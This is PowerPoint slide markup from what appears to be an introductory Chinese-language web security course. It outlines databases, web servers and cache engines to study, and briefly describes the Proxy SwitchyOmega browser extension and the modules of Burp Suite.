                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>了解常见数据库及区别：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>PostgreSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>Oracle</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>Sqlite</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>MongoDB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-432000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>数据库操作：基本语句，文件读取，写入，权限，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>dnslog</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-432000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>服务器：配置主流服务器：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>Apache</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>Nginx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-432000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>缓存引擎：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>Redis</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>Memcached</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DC65920-AE23-F743-BEB7-15325996284E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="716280" y="1005840"/>
            <a:ext cx="5044440" cy="681725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>四</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>数据库和服务器</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1">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138796807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 altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Proxy SwitchyOmega</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>浏览器代理插件</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92989995-A079-9F43-9705-60A873E97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9406" y="1696759"/>
            <a:ext cx="8842354" cy="5074553"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="195964693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 altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Proxy SwitchyOmega</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>浏览器代理插件</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46401160-32A0-9E4F-AD43-F613FCCEC121}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="13927"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="843280" y="1671145"/>
            <a:ext cx="10494054" cy="5186855"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="127160197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Burp</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Suite</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0A7EAA6-BED1-7A4B-8B8A-6320BD325192}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1076632" y="1696065"/>
            <a:ext cx="9866671" cy="4672113"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2100" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Target(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>目标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>显示目标目录结构的的一个功能 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2100" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Proxy(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>代理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>拦截</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2100" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HTTP/S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的代理服务器，作为一个在浏览器和目标应用程序之间的中间人，允许你拦截，查看，修改在两个方向上的原始数据流。 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2100" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Spider(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>蜘蛛</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>应用智能感应的网络爬虫，它能完整的枚举应用程序的内容和功能。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2100" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Scanner(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>扫描器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>高级工具，执行后，它能自动地发现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2100" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>应用程序的安全漏洞。 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2100" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Intruder(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>入侵</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>一个定制的高度可配置的工具，对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2100" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>应用程序进行自动化攻击，如：枚举标识符，收集有用的数据，以及使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2100" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>fuzzing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>技术探测常规漏洞。 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2100" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Repeater(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>中继器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>一个靠手动操作来触发单独的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2100" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>请求，并分析应用程序响应的工具。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2100">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28658696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Burp</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Suite</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0A7EAA6-BED1-7A4B-8B8A-6320BD325192}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1076632" y="1696065"/>
            <a:ext cx="9866671" cy="3411768"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2100" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Sequencer(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>会话</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>用来分析那些不可预知的应用程序会话令牌和重要数据项的随机性的工具。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2100" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Decoder(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>解码器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>进行手动执行或对应用程序数据者智能解码编码的工具。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2100" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Comparer(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>对比</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>通常是通过一些相关的请求和响应得到两项数据的一个可视化的“差异”。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2100" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Extender(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>扩展</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可以让你加载</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2100" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Burp Suite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的扩展，使用你自己的或第三方代码来扩展</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2100" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Burp Suit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的功能。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2100" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Options(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>设置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2100" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Burp Suite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的一些设置</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2100">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="362001132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Proxy</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>模块</a:t>
            </a:r>
